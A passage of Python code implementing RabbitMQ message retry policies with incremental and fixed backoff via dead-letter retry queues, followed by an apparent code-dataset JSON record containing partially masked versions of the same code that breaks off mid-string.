The retry queue is redeclared before every a new message is sent to it.
Redeclaration resets the queue's TTL, preventing it from being destroyed.
:param int delay: Retry delay in seconds
:return: retry queue name
:rtype: str
"""
delay_in_ms = int(delay * 1000)
retry_queue_name = '{}.{}.{}'.format(
self.consumer.queue_name, self.retry_queue_suffix, delay_in_ms)
# To avoid frequent queue create and destroy for low retry delays
queue_ttl = delay_in_ms * 2
if queue_ttl < self.min_retry_queue_ttl:
queue_ttl = self.min_retry_queue_ttl
self.consumer.channel.queue_declare(
callback=None,
queue=retry_queue_name,
durable=self.consumer.durable,
nowait=True,
arguments={
'x-dead-letter-exchange': '',
'x-dead-letter-routing-key': self.consumer.queue_name,
'x-message-ttl': delay_in_ms,
'x-expires': queue_ttl
})
logger.warning(
'Retry queue "{}" is created/redeclared'.format(retry_queue_name))
return retry_queue_name
class UnlimitedRetriesPolicy(BaseRetryPolicy):
"""Unlimited Retries Policy.
This is an implementation of :class:`.RetryPolicy` which does incremental backoff,
unlimited retries.
:attr:`initial_delay`: is the initial/first backoff delay in seconds
:attr:`delay_incremented_by`: is number of seconds the backoff should be incremented
by after each death
:attr:`max_delay`: is the final/maximum backoff delay in seconds that should net be
exceeded
"""
def __init__(self,
consumer,
initial_delay,
max_delay,
delay_incremented_by,
retry_queue_suffix='retry',
**kwargs):
# type: (UnlimitedRetriesPolicy, Consumer, int, int, int, str) -> None
"""
:param Consumer consumer: message consumer instance
:param int initial_delay: `initial_delay` is the initial/first backoff delay
in seconds.
:param int max_delay: `max_delay` is the final/maximum backoff delay in seconds
that should net be exceeded. When exceeded, this max is used.
:param int delay_incremented_by: `delay_incremented_by` is number of seconds
the backoff should be incremented by after each death.
:param: str retry_queue_suffix: suffix used when naming retry queues.
"""
super(UnlimitedRetriesPolicy,
self).__init__(consumer, retry_queue_suffix, **kwargs)
assert initial_delay >= 0
assert delay_incremented_by >= 0
assert max_delay >= initial_delay
self.initial_delay = initial_delay
self.max_delay = max_delay
self.delay_incremented_by = delay_incremented_by
def retry(self, envelope):
# type: (UnlimitedRetriesPolicy, Envelope) -> None
"""Send message to retry queue to retry handling it later.
Death count is calculated by examining 'x-death' header. Based on the death
count, the message is sent to a retry queue where it waits there till it
expires and gets sent back to the original queue for handling retry.
:param Envelope envelope: Message envelope
"""
death_count = self.get_death_count(envelope)
delay = self.initial_delay + (death_count * self.delay_incremented_by)
if delay > self.max_delay:
delay = self.max_delay
retry_queue_name = self.declare_retry_queue(delay)
# Save original delivery information
if envelope.get_header('x-original-delivery-info') is None:
self.set_original_delivery_info_header(envelope)
self.consumer.channel.basic_publish(
exchange='',
routing_key=retry_queue_name,
properties=envelope.properties,
body=envelope.payload)
self.consumer.channel.basic_ack(envelope.delivery_tag)
logger.warning(
'Retry handling message [{}] after {}s; death count: {}'.format(
envelope.message_id, delay, death_count + 1))
class LimitedRetriesPolicy(BaseRetryPolicy):
"""Limited Retries Policy.
This is an implementation of :class:`.RetryPolicy` which does incremental backoff,
limited number of retries.
:attr:`consumer`: message consumer instance
:attr:`retry_delays`: immutable list of retry backoff delays in seconds. Message
is sent to dlx when this list is exhausted. e.g ``(1, 5, 10, 60, 5 * 60)``
:attr:`retry_queue_suffix`: suffix str used when naming retry queues.
"""
def __init__(self,
consumer,
retry_delays,
retry_queue_suffix='retry',
**kwargs):
# type: (LimitedRetriesPolicy, Consumer, Iterable[int], str) -> None
"""
:param Consumer consumer: message consumer instance
:param Iterable[int] retry_delays: Immutable list of retry backoff delays in
seconds. Message is sent to dlx when this list is exhausted.
e.g ``(1, 5, 10, 60, 5 * 60)``
:param: str retry_queue_suffix: suffix used when naming retry queues.
"""
assert len(retry_delays) > 0
super(LimitedRetriesPolicy, self).__init__(consumer, retry_queue_suffix,
**kwargs)
self.retry_delays = retry_delays
def retry(self, envelope):
# type: (LimitedRetriesPolicy, Envelope) -> None
"""Send message to retry queue to retry handling it later.
Death count is calculated by examining 'x-death' header. Based on the death
count, the message is sent to a retry queue where it waits there till it
expires and gets sent back to the original queue for handling retry.
The death count is used as an index for `retry_delays` list. Where each
item in the list represents a retry delay in seconds.
The message will be rejected if the death count exceeded the length of
`retry_delays` list.
:param Envelope envelope: Message envelope
"""
death_count = self.get_death_count(envelope)
if death_count < len(self.retry_delays):
delay = self.retry_delays[death_count]
retry_queue_name = self.declare_retry_queue(delay)
# Save original delivery information
if envelope.get_header('x-original-delivery-info') is None:
self.set_original_delivery_info_header(envelope)
self.consumer.channel.basic_publish(
exchange='',
routing_key=retry_queue_name,
properties=envelope.properties,
body=envelope.payload)
self.consumer.channel.basic_ack(envelope.delivery_tag)
logger.warning(
'Retry handling message [{}] after {}s; death count: {}'.format(
envelope.message_id, delay, death_count + 1))
else:
logger.warning(
'Message [{}] exceeded retry limit; death count: {}'.format(
envelope.message_id, death_count + 1))
self.consumer.channel.basic_reject(
envelope.delivery_tag, requeue=False)
logger.error('Message [{}] is rejected'.format(envelope.message_id))
class FixedDelayUnlimitedRetriesPolicy(UnlimitedRetriesPolicy):
"""Fixed delay unlimited retries policy.
This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,
unlimited retries.
:attr:`consumer`: consumer instance
:attr:`delay`: retry delay in seconds
:attr:`retry_queue_suffix`: suffix str used when naming retry queues.
"""
def __init__(self, consumer, delay, retry_queue_suffix='retry', **kwargs):
# type: (FixedDelayUnlimitedRetriesPolicy, Consumer, int, str) -> None
"""
:param Consumer consumer: message consumer instance
:param int delay: retry delay in seconds
:param: str retry_queue_suffix: suffix used when naming retry queues.
"""
super(FixedDelayUnlimitedRetriesPolicy, self).__init__(
consumer=consumer,
initial_delay=delay,
max_delay=delay,
delay_incremented_by=0,
retry_queue_suffix=retry_queue_suffix,
**kwargs)
class FixedDelayLimitedRetriesPolicy(LimitedRetriesPolicy):
"""Fixed delay limited retries policy.
This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,
limited number of retries.
:attr:`consumer`: consumer instance
:attr:`delay`: retry delay in seconds.
:attr:`retries_limit`: retries limit count.
:attr:`retry_queue_suffix`: suffix str used when naming retry queues.
"""
def __init__(self,
consumer,
delay,
retries_limit,
retry_queue_suffix='retry',
**kwargs):
# type: (FixedDelayLimitedRetriesPolicy, Consumer, int, int, str) -> None
"""
:param Consumer consumer: message consumer instance
:param int delay: retry delay in seconds
:param int retries_limit: retries limit count
:param: str retry_queue_suffix: suffix used when naming retry queues.
"""
assert retries_limit > 0
retry_delays = tuple([delay] * retries_limit)
super(FixedDelayLimitedRetriesPolicy, self).__init__(
consumer=consumer,
retry_delays=retry_delays,
retry_queue_suffix=retry_queue_suffix,
**kwargs)
|
flexible
|
{
"blob_id": "848934680253ff2950db7723b1fe82b2ae799900",
"index": 801,
"step-1": "<mask token>\n\n\nclass LimitedRetriesPolicy(BaseRetryPolicy):\n <mask token>\n\n def __init__(self, consumer, retry_delays, retry_queue_suffix='retry',\n **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param Iterable[int] retry_delays: Immutable list of retry backoff delays in\n seconds. Message is sent to dlx when this list is exhausted.\n e.g ``(1, 5, 10, 60, 5 * 60)``\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert len(retry_delays) > 0\n super(LimitedRetriesPolicy, self).__init__(consumer,\n retry_queue_suffix, **kwargs)\n self.retry_delays = retry_delays\n\n def retry(self, envelope):\n \"\"\"Send message to retry queue to retry handling it later.\n\n Death count is calculated by examining 'x-death' header. Based on the death\n count, the message is sent to a retry queue where it waits there till it\n expires and gets sent back to the original queue for handling retry.\n\n The death count is used as an index for `retry_delays` list. Where each\n item in the list represents a retry delay in seconds.\n\n The message will be rejected if the death count exceeded the length of\n `retry_delays` list.\n\n :param Envelope envelope: Message envelope\n \"\"\"\n death_count = self.get_death_count(envelope)\n if death_count < len(self.retry_delays):\n delay = self.retry_delays[death_count]\n retry_queue_name = self.declare_retry_queue(delay)\n if envelope.get_header('x-original-delivery-info') is None:\n self.set_original_delivery_info_header(envelope)\n self.consumer.channel.basic_publish(exchange='', routing_key=\n retry_queue_name, properties=envelope.properties, body=\n envelope.payload)\n self.consumer.channel.basic_ack(envelope.delivery_tag)\n logger.warning(\n 'Retry handling message [{}] after {}s; death count: {}'.\n format(envelope.message_id, delay, death_count + 1))\n else:\n logger.warning('Message [{}] exceeded retry limit; death count: {}'\n .format(envelope.message_id, death_count + 1))\n self.consumer.channel.basic_reject(envelope.delivery_tag,\n requeue=False)\n logger.error('Message [{}] is rejected'.format(envelope.message_id)\n )\n\n\nclass FixedDelayUnlimitedRetriesPolicy(UnlimitedRetriesPolicy):\n \"\"\"Fixed delay unlimited retries policy.\n\n This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,\n unlimited retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, delay, retry_queue_suffix='retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n super(FixedDelayUnlimitedRetriesPolicy, self).__init__(consumer=\n consumer, initial_delay=delay, max_delay=delay,\n delay_incremented_by=0, retry_queue_suffix=retry_queue_suffix,\n **kwargs)\n\n\nclass FixedDelayLimitedRetriesPolicy(LimitedRetriesPolicy):\n \"\"\"Fixed delay limited retries policy.\n\n This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,\n limited number of retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds.\n\n :attr:`retries_limit`: retries limit count.\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, delay, retries_limit, retry_queue_suffix=\n 'retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param int retries_limit: retries limit count\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert retries_limit > 0\n retry_delays = tuple([delay] * retries_limit)\n super(FixedDelayLimitedRetriesPolicy, self).__init__(consumer=\n consumer, retry_delays=retry_delays, retry_queue_suffix=\n retry_queue_suffix, **kwargs)\n",
"step-2": "<mask token>\n\n\nclass UnlimitedRetriesPolicy(BaseRetryPolicy):\n <mask token>\n\n def __init__(self, consumer, initial_delay, max_delay,\n delay_incremented_by, retry_queue_suffix='retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int initial_delay: `initial_delay` is the initial/first backoff delay\n in seconds.\n\n :param int max_delay: `max_delay` is the final/maximum backoff delay in seconds\n that should net be exceeded. When exceeded, this max is used.\n\n :param int delay_incremented_by: `delay_incremented_by` is number of seconds\n the backoff should be incremented by after each death.\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n super(UnlimitedRetriesPolicy, self).__init__(consumer,\n retry_queue_suffix, **kwargs)\n assert initial_delay >= 0\n assert delay_incremented_by >= 0\n assert max_delay >= initial_delay\n self.initial_delay = initial_delay\n self.max_delay = max_delay\n self.delay_incremented_by = delay_incremented_by\n\n def retry(self, envelope):\n \"\"\"Send message to retry queue to retry handling it later.\n\n Death count is calculated by examining 'x-death' header. Based on the death\n count, the message is sent to a retry queue where it waits there till it\n expires and gets sent back to the original queue for handling retry.\n\n :param Envelope envelope: Message envelope\n \"\"\"\n death_count = self.get_death_count(envelope)\n delay = self.initial_delay + death_count * self.delay_incremented_by\n if delay > self.max_delay:\n delay = self.max_delay\n retry_queue_name = self.declare_retry_queue(delay)\n if envelope.get_header('x-original-delivery-info') is None:\n self.set_original_delivery_info_header(envelope)\n self.consumer.channel.basic_publish(exchange='', routing_key=\n retry_queue_name, properties=envelope.properties, body=envelope\n .payload)\n self.consumer.channel.basic_ack(envelope.delivery_tag)\n logger.warning('Retry handling message [{}] after {}s; death count: {}'\n .format(envelope.message_id, delay, death_count + 1))\n\n\nclass LimitedRetriesPolicy(BaseRetryPolicy):\n \"\"\"Limited Retries Policy.\n\n This is an implementation of :class:`.RetryPolicy` which does incremental backoff,\n limited number of retries.\n\n :attr:`consumer`: message consumer instance\n\n :attr:`retry_delays`: immutable list of retry backoff delays in seconds. Message\n is sent to dlx when this list is exhausted. e.g ``(1, 5, 10, 60, 5 * 60)``\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, retry_delays, retry_queue_suffix='retry',\n **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param Iterable[int] retry_delays: Immutable list of retry backoff delays in\n seconds. Message is sent to dlx when this list is exhausted.\n e.g ``(1, 5, 10, 60, 5 * 60)``\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert len(retry_delays) > 0\n super(LimitedRetriesPolicy, self).__init__(consumer,\n retry_queue_suffix, **kwargs)\n self.retry_delays = retry_delays\n\n def retry(self, envelope):\n \"\"\"Send message to retry queue to retry handling it later.\n\n Death count is calculated by examining 'x-death' header. Based on the death\n count, the message is sent to a retry queue where it waits there till it\n expires and gets sent back to the original queue for handling retry.\n\n The death count is used as an index for `retry_delays` list. Where each\n item in the list represents a retry delay in seconds.\n\n The message will be rejected if the death count exceeded the length of\n `retry_delays` list.\n\n :param Envelope envelope: Message envelope\n \"\"\"\n death_count = self.get_death_count(envelope)\n if death_count < len(self.retry_delays):\n delay = self.retry_delays[death_count]\n retry_queue_name = self.declare_retry_queue(delay)\n if envelope.get_header('x-original-delivery-info') is None:\n self.set_original_delivery_info_header(envelope)\n self.consumer.channel.basic_publish(exchange='', routing_key=\n retry_queue_name, properties=envelope.properties, body=\n envelope.payload)\n self.consumer.channel.basic_ack(envelope.delivery_tag)\n logger.warning(\n 'Retry handling message [{}] after {}s; death count: {}'.\n format(envelope.message_id, delay, death_count + 1))\n else:\n logger.warning('Message [{}] exceeded retry limit; death count: {}'\n .format(envelope.message_id, death_count + 1))\n self.consumer.channel.basic_reject(envelope.delivery_tag,\n requeue=False)\n logger.error('Message [{}] is rejected'.format(envelope.message_id)\n )\n\n\nclass FixedDelayUnlimitedRetriesPolicy(UnlimitedRetriesPolicy):\n \"\"\"Fixed delay unlimited retries policy.\n\n This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,\n unlimited retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, delay, retry_queue_suffix='retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n super(FixedDelayUnlimitedRetriesPolicy, self).__init__(consumer=\n consumer, initial_delay=delay, max_delay=delay,\n delay_incremented_by=0, retry_queue_suffix=retry_queue_suffix,\n **kwargs)\n\n\nclass FixedDelayLimitedRetriesPolicy(LimitedRetriesPolicy):\n \"\"\"Fixed delay limited retries policy.\n\n This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,\n limited number of retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds.\n\n :attr:`retries_limit`: retries limit count.\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, delay, retries_limit, retry_queue_suffix=\n 'retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param int retries_limit: retries limit count\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert retries_limit > 0\n retry_delays = tuple([delay] * retries_limit)\n super(FixedDelayLimitedRetriesPolicy, self).__init__(consumer=\n consumer, retry_delays=retry_delays, retry_queue_suffix=\n retry_queue_suffix, **kwargs)\n",
"step-3": "<mask token>\n\n\nclass BaseRetryPolicy(RetryPolicy):\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n\nclass UnlimitedRetriesPolicy(BaseRetryPolicy):\n \"\"\"Unlimited Retries Policy.\n\n This is an implementation of :class:`.RetryPolicy` which does incremental backoff,\n unlimited retries.\n\n :attr:`initial_delay`: is the initial/first backoff delay in seconds\n\n :attr:`delay_incremented_by`: is number of seconds the backoff should be incremented\n by after each death\n\n :attr:`max_delay`: is the final/maximum backoff delay in seconds that should net be\n exceeded\n \"\"\"\n\n def __init__(self, consumer, initial_delay, max_delay,\n delay_incremented_by, retry_queue_suffix='retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int initial_delay: `initial_delay` is the initial/first backoff delay\n in seconds.\n\n :param int max_delay: `max_delay` is the final/maximum backoff delay in seconds\n that should net be exceeded. When exceeded, this max is used.\n\n :param int delay_incremented_by: `delay_incremented_by` is number of seconds\n the backoff should be incremented by after each death.\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n super(UnlimitedRetriesPolicy, self).__init__(consumer,\n retry_queue_suffix, **kwargs)\n assert initial_delay >= 0\n assert delay_incremented_by >= 0\n assert max_delay >= initial_delay\n self.initial_delay = initial_delay\n self.max_delay = max_delay\n self.delay_incremented_by = delay_incremented_by\n\n def retry(self, envelope):\n \"\"\"Send message to retry queue to retry handling it later.\n\n Death count is calculated by examining 'x-death' header. Based on the death\n count, the message is sent to a retry queue where it waits there till it\n expires and gets sent back to the original queue for handling retry.\n\n :param Envelope envelope: Message envelope\n \"\"\"\n death_count = self.get_death_count(envelope)\n delay = self.initial_delay + death_count * self.delay_incremented_by\n if delay > self.max_delay:\n delay = self.max_delay\n retry_queue_name = self.declare_retry_queue(delay)\n if envelope.get_header('x-original-delivery-info') is None:\n self.set_original_delivery_info_header(envelope)\n self.consumer.channel.basic_publish(exchange='', routing_key=\n retry_queue_name, properties=envelope.properties, body=envelope\n .payload)\n self.consumer.channel.basic_ack(envelope.delivery_tag)\n logger.warning('Retry handling message [{}] after {}s; death count: {}'\n .format(envelope.message_id, delay, death_count + 1))\n\n\nclass LimitedRetriesPolicy(BaseRetryPolicy):\n \"\"\"Limited Retries Policy.\n\n This is an implementation of :class:`.RetryPolicy` which does incremental backoff,\n limited number of retries.\n\n :attr:`consumer`: message consumer instance\n\n :attr:`retry_delays`: immutable list of retry backoff delays in seconds. Message\n is sent to dlx when this list is exhausted. e.g ``(1, 5, 10, 60, 5 * 60)``\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, retry_delays, retry_queue_suffix='retry',\n **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param Iterable[int] retry_delays: Immutable list of retry backoff delays in\n seconds. Message is sent to dlx when this list is exhausted.\n e.g ``(1, 5, 10, 60, 5 * 60)``\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert len(retry_delays) > 0\n super(LimitedRetriesPolicy, self).__init__(consumer,\n retry_queue_suffix, **kwargs)\n self.retry_delays = retry_delays\n\n def retry(self, envelope):\n \"\"\"Send message to retry queue to retry handling it later.\n\n Death count is calculated by examining 'x-death' header. Based on the death\n count, the message is sent to a retry queue where it waits there till it\n expires and gets sent back to the original queue for handling retry.\n\n The death count is used as an index for `retry_delays` list. Where each\n item in the list represents a retry delay in seconds.\n\n The message will be rejected if the death count exceeded the length of\n `retry_delays` list.\n\n :param Envelope envelope: Message envelope\n \"\"\"\n death_count = self.get_death_count(envelope)\n if death_count < len(self.retry_delays):\n delay = self.retry_delays[death_count]\n retry_queue_name = self.declare_retry_queue(delay)\n if envelope.get_header('x-original-delivery-info') is None:\n self.set_original_delivery_info_header(envelope)\n self.consumer.channel.basic_publish(exchange='', routing_key=\n retry_queue_name, properties=envelope.properties, body=\n envelope.payload)\n self.consumer.channel.basic_ack(envelope.delivery_tag)\n logger.warning(\n 'Retry handling message [{}] after {}s; death count: {}'.\n format(envelope.message_id, delay, death_count + 1))\n else:\n logger.warning('Message [{}] exceeded retry limit; death count: {}'\n .format(envelope.message_id, death_count + 1))\n self.consumer.channel.basic_reject(envelope.delivery_tag,\n requeue=False)\n logger.error('Message [{}] is rejected'.format(envelope.message_id)\n )\n\n\nclass FixedDelayUnlimitedRetriesPolicy(UnlimitedRetriesPolicy):\n \"\"\"Fixed delay unlimited retries policy.\n\n This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,\n unlimited retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, delay, retry_queue_suffix='retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n super(FixedDelayUnlimitedRetriesPolicy, self).__init__(consumer=\n consumer, initial_delay=delay, max_delay=delay,\n delay_incremented_by=0, retry_queue_suffix=retry_queue_suffix,\n **kwargs)\n\n\nclass FixedDelayLimitedRetriesPolicy(LimitedRetriesPolicy):\n \"\"\"Fixed delay limited retries policy.\n\n This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,\n limited number of retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds.\n\n :attr:`retries_limit`: retries limit count.\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, delay, retries_limit, retry_queue_suffix=\n 'retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int delay: retry delay in seconds\n\n :param int retries_limit: retries limit count\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert retries_limit > 0\n retry_delays = tuple([delay] * retries_limit)\n super(FixedDelayLimitedRetriesPolicy, self).__init__(consumer=\n consumer, retry_delays=retry_delays, retry_queue_suffix=\n retry_queue_suffix, **kwargs)\n",
"step-4": "<mask token>\n\n\nclass RetryPolicy(object):\n <mask token>\n\n def __init__(self, **kwargs):\n super(RetryPolicy, self).__init__()\n\n def retry(self, envelope):\n \"\"\"This method is implemented by the subclass.\"\"\"\n raise NotImplementedError()\n\n\nclass BaseRetryPolicy(RetryPolicy):\n \"\"\"Base retry policy class for :class:`.UnlimitedRetriesPolicy` and\n :class:`.LimitedRetriesPolicy`.\n\n It has implementation for geting mesage death count and retry queue creation.\n \"\"\"\n\n def __init__(self, consumer, retry_queue_suffix='retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param str retry_queue_suffix: Suffix used when creating retry queues. Retry\n queue names are constructed in this form \"queue_name.<suffix>.<delay>\".\n Optional, default to ``retry``\n \"\"\"\n super(BaseRetryPolicy, self).__init__(**kwargs)\n retry_queue_suffix = retry_queue_suffix.strip()\n self.consumer = consumer\n assert len(retry_queue_suffix) > 0\n self.retry_queue_suffix = retry_queue_suffix\n self.min_retry_queue_ttl = 20 * 1000\n\n def set_original_delivery_info_header(self, envelope):\n \"\"\"Save original message delivery infomation in a header.\"\"\"\n if not envelope.get_header('x-original-delivery-info'):\n original_delivery_info = {'consumer_tag': envelope.\n delivery_info.consumer_tag, 'delivery_tag': envelope.\n delivery_info.delivery_tag, 'redelivered': envelope.\n delivery_info.redelivered, 'exchange': envelope.\n delivery_info.exchange, 'routing_key': envelope.\n delivery_info.routing_key}\n envelope.set_header('x-original-delivery-info',\n original_delivery_info)\n\n def get_death_count(self, envelope):\n \"\"\"Return the death count of a message by examining \"x-death\" header.\n\n :param Envelope envelope: Message envelope\n\n :return int: death count\n \"\"\"\n death_header = envelope.get_header('x-death')\n if death_header is None:\n return 0\n count = 0\n for death in death_header:\n if not death['queue'].startswith(self.consumer.queue_name):\n continue\n count += death.get('count', 1)\n return count\n\n def declare_retry_queue(self, delay):\n \"\"\"Declare a retry queue for the provided delay.\n\n Each different delay has a different queue where all retry messages with the\n same delay will be sent to till they expire and get sent back to the original\n queue for handling retry. The queue is declared with a TTL and automatically\n gets deleted. The queue TTL is equal to the provided delay. The retry\n queue's dead letter exchange is (default) direct exchange and the dead letter\n routing key is the original queue name where the messages originally\n came from. The messages will be sent back to the original queue when they\n reach their TTL, for handling retry.\n\n The retry queue is redeclared before every a new message is sent to it.\n Redeclaration resets the queue's TTL, preventing it from being destroyed.\n\n\n :param int delay: Retry delay in seconds\n\n :return: retry queue name\n :rtype: str\n \"\"\"\n delay_in_ms = int(delay * 1000)\n retry_queue_name = '{}.{}.{}'.format(self.consumer.queue_name, self\n .retry_queue_suffix, delay_in_ms)\n queue_ttl = delay_in_ms * 2\n if queue_ttl < self.min_retry_queue_ttl:\n queue_ttl = self.min_retry_queue_ttl\n self.consumer.channel.queue_declare(callback=None, queue=\n retry_queue_name, durable=self.consumer.durable, nowait=True,\n arguments={'x-dead-letter-exchange': '',\n 'x-dead-letter-routing-key': self.consumer.queue_name,\n 'x-message-ttl': delay_in_ms, 'x-expires': queue_ttl})\n logger.warning('Retry queue \"{}\" is created/redeclared'.format(\n retry_queue_name))\n return retry_queue_name\n\n\nclass UnlimitedRetriesPolicy(BaseRetryPolicy):\n \"\"\"Unlimited Retries Policy.\n\n This is an implementation of :class:`.RetryPolicy` which does incremental backoff,\n unlimited retries.\n\n :attr:`initial_delay`: is the initial/first backoff delay in seconds\n\n :attr:`delay_incremented_by`: is number of seconds the backoff should be incremented\n by after each death\n\n :attr:`max_delay`: is the final/maximum backoff delay in seconds that should net be\n exceeded\n \"\"\"\n\n def __init__(self, consumer, initial_delay, max_delay,\n delay_incremented_by, retry_queue_suffix='retry', **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param int initial_delay: `initial_delay` is the initial/first backoff delay\n in seconds.\n\n :param int max_delay: `max_delay` is the final/maximum backoff delay in seconds\n that should net be exceeded. When exceeded, this max is used.\n\n :param int delay_incremented_by: `delay_incremented_by` is number of seconds\n the backoff should be incremented by after each death.\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n super(UnlimitedRetriesPolicy, self).__init__(consumer,\n retry_queue_suffix, **kwargs)\n assert initial_delay >= 0\n assert delay_incremented_by >= 0\n assert max_delay >= initial_delay\n self.initial_delay = initial_delay\n self.max_delay = max_delay\n self.delay_incremented_by = delay_incremented_by\n\n def retry(self, envelope):\n \"\"\"Send message to retry queue to retry handling it later.\n\n Death count is calculated by examining 'x-death' header. Based on the death\n count, the message is sent to a retry queue where it waits there till it\n expires and gets sent back to the original queue for handling retry.\n\n :param Envelope envelope: Message envelope\n \"\"\"\n death_count = self.get_death_count(envelope)\n delay = self.initial_delay + death_count * self.delay_incremented_by\n if delay > self.max_delay:\n delay = self.max_delay\n retry_queue_name = self.declare_retry_queue(delay)\n if envelope.get_header('x-original-delivery-info') is None:\n self.set_original_delivery_info_header(envelope)\n self.consumer.channel.basic_publish(exchange='', routing_key=\n retry_queue_name, properties=envelope.properties, body=envelope\n .payload)\n self.consumer.channel.basic_ack(envelope.delivery_tag)\n logger.warning('Retry handling message [{}] after {}s; death count: {}'\n .format(envelope.message_id, delay, death_count + 1))\n\n\nclass LimitedRetriesPolicy(BaseRetryPolicy):\n \"\"\"Limited Retries Policy.\n\n This is an implementation of :class:`.RetryPolicy` which does incremental backoff,\n limited number of retries.\n\n :attr:`consumer`: message consumer instance\n\n :attr:`retry_delays`: immutable list of retry backoff delays in seconds. Message\n is sent to dlx when this list is exhausted. e.g ``(1, 5, 10, 60, 5 * 60)``\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, retry_delays, retry_queue_suffix='retry',\n **kwargs):\n \"\"\"\n :param Consumer consumer: message consumer instance\n\n :param Iterable[int] retry_delays: Immutable list of retry backoff delays in\n seconds. Message is sent to dlx when this list is exhausted.\n e.g ``(1, 5, 10, 60, 5 * 60)``\n\n :param: str retry_queue_suffix: suffix used when naming retry queues.\n \"\"\"\n assert len(retry_delays) > 0\n super(LimitedRetriesPolicy, self).__init__(consumer,\n retry_queue_suffix, **kwargs)\n self.retry_delays = retry_delays\n\n def retry(self, envelope):\n \"\"\"Send message to retry queue to retry handling it later.\n\n Death count is calculated by examining 'x-death' header. Based on the death\n count, the message is sent to a retry queue where it waits there till it\n expires and gets sent back to the original queue for handling retry.\n\n The death count is used as an index for `retry_delays` list. Where each\n item in the list represents a retry delay in seconds.\n\n The message will be rejected if the death count exceeded the length of\n `retry_delays` list.\n\n :param Envelope envelope: Message envelope\n \"\"\"\n death_count = self.get_death_count(envelope)\n if death_count < len(self.retry_delays):\n delay = self.retry_delays[death_count]\n retry_queue_name = self.declare_retry_queue(delay)\n if envelope.get_header('x-original-delivery-info') is None:\n self.set_original_delivery_info_header(envelope)\n self.consumer.channel.basic_publish(exchange='', routing_key=\n retry_queue_name, properties=envelope.properties, body=\n envelope.payload)\n self.consumer.channel.basic_ack(envelope.delivery_tag)\n logger.warning(\n 'Retry handling message [{}] after {}s; death count: {}'.\n format(envelope.message_id, delay, death_count + 1))\n else:\n logger.warning('Message [{}] exceeded retry limit; death count: {}'\n .format(envelope.message_id, death_count + 1))\n self.consumer.channel.basic_reject(envelope.delivery_tag,\n requeue=False)\n logger.error('Message [{}] is rejected'.format(envelope.message_id)\n )\n\n\nclass FixedDelayUnlimitedRetriesPolicy(UnlimitedRetriesPolicy):\n \"\"\"Fixed delay unlimited retries policy.\n\n This is an implementation of :class:`.RetryPolicy` which does fix backoff delay,\n unlimited retries.\n\n :attr:`consumer`: consumer instance\n\n :attr:`delay`: retry delay in seconds\n\n :attr:`retry_queue_suffix`: suffix str used when naming retry queues.\n \"\"\"\n\n def __init__(self, consumer, delay, retry_queue_suffix='retry', 